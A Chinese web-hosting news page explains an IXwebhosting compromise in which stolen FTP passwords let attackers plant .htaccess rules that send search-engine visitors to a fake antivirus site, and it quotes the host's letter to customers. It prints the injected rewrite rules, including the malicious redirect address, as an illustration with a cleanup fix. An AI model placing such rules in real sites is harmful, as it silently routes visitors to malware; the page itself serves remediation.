关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- racknerd 大带宽大流量美国 vps 低至 8 元 月起,1 核 美国VPS[主机]
- 搬瓦工 VPS 最新有货方案整理,美国 CN2 GT 香港 PCCW 直美国VPS[主机]
- NameSilo→.xyz .top 等域名 首年 0.99 美金 一次全球[VPS测评]
- 从 MySQL 日志中恢复数据的办法全球[VPS测评]
- Hostigger→$11.94 年 1GB 内存 10GB SSD 空虚拟空间(主机)
- ThinkPHP5 在 Nginx 下面报 404 错误的解决办法全球[VPS测评]
- thinkphp5 获取用户 ip tp5 获取客户端 ip全球[VPS测评]
- 疯狂猜成语 图猜成语一个男人在前面唱歌一个女人在后面跟着是什么成语?全球[VPS测评]
- 蓝米云→29 元 月 1GB 内存 40GB SSD 空间 不限流量 1虚拟空间(主机)
- Hosteons→KVM 八折 OpenVZ 年付五折 不限流量 免费升全球[VPS测评]
- NameSilo→.co 域名 首年 1.7 美金 5 年 8.7 美金全球[VPS测评]
- Oracle Cloud - 甲骨文云主机各机房测试 IP全球[VPS测评]
- ThinkPHP5 中 success 和 error 方法传参的办法全球[VPS测评]
- 修罗云→45 元 月 256MB 内存 6GB 空间 50GB 流量 1虚拟空间(主机)
- 疯狂猜成语 图猜成语一把刀切断一根黄瓜是什么成语?全球[VPS测评]
- racknerd→高配便宜 VPS $29 年 KVM 虚拟 VPS 4全球[VPS测评]
- 菠萝云→99 元 月 4 核 4GB 内存 100GB SSD 空间 不虚拟空间(主机)
- Vultr VPS主机取消 $3.5入门机型及新用户赠送$25全球[VPS测评]
- Wikihost → 韩国 → Ceph BGP 512M 20G 2韩国VPS[主机]
- 做跨境电商一个月都有多少收入?全球[VPS测评]
- 亿速云香港服务器助力企业出海 有哪些具体的特点和优势?香港VPS[主机]
- 无忧云,香港VPS全线5折促销,四川高防服务器/大连BGP/德阳高防/深香港VPS[主机]
- 亿恩科技香港云服务器 2核2G服务器特价700元/年香港VPS[主机]
- 欧亚云:新春优惠,洛杉矶CERA云主机仅25元/月起,香港CN2仅28元香港VPS[主机]
- 云基:香港/洛杉矶CN2 GIA服务器促销,3750元/月起;欧洲大盘鸡香港VPS[主机]
- 孤狼云:2021春节优惠,香港安畅CN2、香港沙田CN2云服务器低至10香港VPS[主机]
- 云计算拯救互联网巨头?全球[VPS测评]
- 拼多多拟建跨境电商平台:挖角SHEIN员工,0佣金招商入驻全球[VPS测评]
- 宝塔面板nginx中的网站如何添加身份验证?全球[VPS测评]
- 磐逸云怎么样?CN2线路香港VPS月付20元香港VPS[主机]
转载请注明原文地址:http://140.238.13.167:12355/read-88181.html











